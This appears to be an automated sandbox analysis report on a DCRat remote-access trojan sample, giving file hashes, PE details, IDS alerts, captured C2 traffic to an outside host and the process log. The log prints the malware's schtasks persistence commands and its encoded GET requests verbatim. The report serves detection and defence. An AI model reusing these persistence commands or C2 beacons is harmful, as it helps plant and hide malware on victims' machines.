                SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
                SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
                Malicious:true
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe.log

                Download File
                Process:C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1673
                Entropy (8bit):5.358592927981826
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpv
                MD5:3FA79285624FEE3EDA6CADAE6686B2D7
                SHA1:B4FCD984A014AF609AA60902FAB53EFE05F72D26
                SHA-256:941DC770C2B1ECCBFE753CE22846C885C111EEBF38B74991B54B2D32D5D46466
                SHA-512:2E5B2FC80CAEFCB6D615CC50E4A9250F2A46AFD406720DF016A55AAB09B2EE63A2AED9E7C6832DD6B93318FEFE99EC21D7264207467A764BE078B2226A9002B2
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\StartMenuExperienceHost.exe

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................r$..6......N.$.. ....$...@.. ....................... %...........@...................................$.K.....$.......................%...................................................... ............... ..H............text...Tp$.. ...r$................. ..`.sdata.../....$..0...v$.............@....rsrc.........$.......$.............@..@.reloc........%.......$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\StartMenuExperienceHost.exe:Zone.Identifier

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.606495823005762
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                • Win32 Executable (generic) a (10002005/4) 49.75%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Windows Screen Saver (13104/52) 0.07%
                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                File name:oFAjWuoHBq.exe
                File size:2'403'328 bytes
                MD5:97177514cab51539083ef130f005bbd1
                SHA1:49e2661ee3e8f6fd6b06334b00543590ed8fe208
                SHA256:500a74281de1bc8e6eb4e08eb8705235f4436ccb209ecaca91fe4ad43a869015
                SHA512:7ce6e7255d482b7c78f759098f9744f5f0ef462a79ad061d19f8036061b807963c924665bbe66e23e26a36990b5849d527b750ab6d0e9f6010cf4d665ec3d897
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                TLSH:7CB5CF017E54CE11F00A1633C2FF454847B0AA526AE6E32B7DBA376E59123A77D0D9CB
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb.................r$..6......N.$.. ....$...@.. ....................... %...........@................................

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0x64904e
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x2490000x4b.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24e0000x218.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2500000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x2470540x24720014204a8ae2ac9299e9fea882b26ef065unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .sdata0x24a0000x2fdf0x3000e0e63c73a55b3acd14d0b8c7be7da9c4False0.310302734375data3.2419636848482156IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x24e0000x2180x400eafc2a00adaec2fc1b7a2e08caf971f9False0.263671875data1.8371269699553323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x2500000xc0x200946f5dd2d8e02a8d9e5e6af66d07621dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_VERSION0x24e0580x1c0ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States0.5223214285714286

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-12-29T03:37:02.276316+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.5497045.101.152.1580TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 29, 2024 03:37:00.716665983 CET4970480192.168.2.55.101.152.15
                Dec 29, 2024 03:37:00.836255074 CET80497045.101.152.15192.168.2.5
                Dec 29, 2024 03:37:00.836334944 CET4970480192.168.2.55.101.152.15
                Dec 29, 2024 03:37:00.837323904 CET4970480192.168.2.55.101.152.15
                Dec 29, 2024 03:37:00.956841946 CET80497045.101.152.15192.168.2.5
                Dec 29, 2024 03:37:02.226448059 CET80497045.101.152.15192.168.2.5
                Dec 29, 2024 03:37:02.276315928 CET4970480192.168.2.55.101.152.15
                Dec 29, 2024 03:37:02.539442062 CET4970480192.168.2.55.101.152.15
                Dec 29, 2024 03:37:02.659116030 CET80497045.101.152.15192.168.2.5
                Dec 29, 2024 03:37:02.991574049 CET80497045.101.152.15192.168.2.5
                Dec 29, 2024 03:37:03.002335072 CET4970480192.168.2.55.101.152.15

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 29, 2024 03:36:59.811018944 CET5279353192.168.2.51.1.1.1
                Dec 29, 2024 03:37:00.709100962 CET53527931.1.1.1192.168.2.5

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Dec 29, 2024 03:36:59.811018944 CET192.168.2.51.1.1.10x7192Standard query (0)ilusharx.beget.techA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Dec 29, 2024 03:37:00.709100962 CET1.1.1.1192.168.2.50x7192No error (0)ilusharx.beget.tech5.101.152.15A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • ilusharx.beget.tech

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.5497045.101.152.15803168C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                TimestampBytes transferredDirectionData
                Dec 29, 2024 03:37:00.837323904 CET529OUTGET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                Host: ilusharx.beget.tech
                Connection: Keep-Alive
                Dec 29, 2024 03:37:02.226448059 CET546INHTTP/1.1 200 OK
                Server: nginx-reuseport/1.21.1
                Date: Sun, 29 Dec 2024 02:37:01 GMT
                Content-Type: text/html
                Content-Length: 274
                Last-Modified: Tue, 19 Nov 2024 06:24:41 GMT
                Connection: keep-alive
                Keep-Alive: timeout=30
                ETag: "673c2f29-112"
                Accept-Ranges: bytes
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
                Dec 29, 2024 03:37:02.539442062 CET505OUTGET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                Host: ilusharx.beget.tech
                Dec 29, 2024 03:37:02.991574049 CET546INHTTP/1.1 200 OK
                Server: nginx-reuseport/1.21.1
                Date: Sun, 29 Dec 2024 02:37:02 GMT
                Content-Type: text/html
                Content-Length: 274
                Last-Modified: Tue, 19 Nov 2024 06:24:41 GMT
                Connection: keep-alive
                Keep-Alive: timeout=30
                ETag: "673c2f29-112"
                Accept-Ranges: bytes
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:21:36:53
                Start date:28/12/2024
                Path:C:\Users\user\Desktop\oFAjWuoHBq.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\oFAjWuoHBq.exe"
                Imagebase:0x5d0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                General

                Target ID:2
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:6
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:7
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:8
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:9
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:12
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:13
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AccountPictures\Registry.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:14
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\user\StartMenuExperienceHost.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:15
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
